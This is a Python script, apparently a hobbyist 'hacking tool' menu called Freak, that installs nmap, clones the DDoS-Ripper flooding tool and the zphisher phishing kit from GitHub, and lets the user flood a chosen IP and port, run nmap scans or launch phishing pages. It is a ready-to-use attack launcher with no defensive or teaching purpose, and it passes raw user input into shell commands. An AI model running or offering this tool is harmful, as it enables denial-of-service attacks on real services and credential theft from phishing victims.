import os
import time
import subprocess
os.system("clear")
print("[-] Installing nmap...")
time.sleep(0.5)
os.system("apt update && sudo apt install -y nmap")
os.system("clear")
print("[-] installing wget...")
time.sleep(0.5)
os.system("apt update && sudo apt install -y wget")
os.system("clear")
print("[-] installing python...")
time.sleep(0.5)
os.system("apt update && sudo apt install -y python")
os.system("clear")
print("[-] installing python3...")
time.sleep(0.5)
os.system("apt update && sudo apt install -y python3")
os.system("clear")
print("[-] installing DDoS Ripper...")
time.sleep(0.5)
os.system("git clone https://github.com/palahsu/DDoS-Ripper.git")
os.system("clear")
ddosripper = os.path.join(os.getcwd(), "DDoS-Ripper")
os.chdir(ddosripper)
print("[-] installing zphisher...")
os.system("git clone --depth=1 https://github.com/htr-tech/zphisher.git")
os.system("clear")
while True:    
    os.system("clear")
    print("███████╗██████╗░███████╗░█████╗░██╗░░██╗")
    print("██╔════╝██╔══██╗██╔════╝██╔══██╗██║░██╔╝")
    print("█████╗░░██████╔╝█████╗░░███████║█████═╝░")
    print("██╔══╝░░██╔══██╗██╔══╝░░██╔══██║██╔═██╗░")
    print("██║░░░░░██║░░██║███████╗██║░░██║██║░╚██╗")
    print("╚═╝░░░░░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝")
    print("                      TOOL MADE BY apexvr_ ON TIKTOK")
    print("")
    print("1. Nmap Scan")
    print("2. DDoS (DDoS Ripper)")
    print("3. Zphisher")
    print("98. Update dependencies")
    print("99. Update Freak")
    freakchoice = int(input(">>> "))
    if freakchoice == 98:
        os.system("clear")
        print("[-] Updating nmap...")
        time.sleep(0.5)
        os.system("apt update && sudo apt install -y nmap")
        os.system("clear")
        print("[-] Updating git...")
        time.sleep(0.5)
        os.system("apt update && sudo apt install -y git")
        os.system("clear")
        print("[-] Updating wget...")
        time.sleep(0.5) 
        os.system("apt update && sudo apt install -y wget")
        os.system("clear")
        print("[-] Updating python...")
        time.sleep(0.5)
        os.system("apt update && sudo apt install -y python")
        os.system("clear")
        print("[-] Updating python3...")
        time.sleep(0.5)
        os.system("apt update && sudo apt install -y python3")
        os.system("clear")
    elif freakchoice == 2:
        IPDDOS = input("TARGET IP: ")
        PORTDDOS = int(input("OPEN PORT: "))
        print("Press CTRL + C to break")
        time.sleep(2)
        os.system(f"python3 DRipper.py -s {IPDDOS} -p {PORTDDOS} -t 443")
    elif freakchoice == 1:
        IP = input("TARGET IP: ")
        METHOD = input("SCAN METHOD (sT, sS, Pn...): ")
        os.system(f"nmap -{METHOD} {IP}")
        time.sleep(5)
    elif freakchoice == 3:
        zphisher = os.path.join(os.getcwd(), "zphisher")
        os.chdir(zphisher)
        os.system("chmod +x zphisher.sh")
        os.system("bash zphisher.sh")
    elif freakchoice == 99:
        home = os.path.expanduser("~")
        repo_path = os.path.join(home, "FreakForLinux")
        if os.path.exists(repo_path):
            os.chdir(repo_path)
            subprocess.run(["git", "pull"])
        else:
            os.chdir(home)
            subprocess.run(["git", "clone", "https://github.com/Apex-Arch/FreakForLinux.git"])
            os.chdir(repo_path)
            subprocess.run(["python3", "Freak.py"])
            time.sleep(2)
        
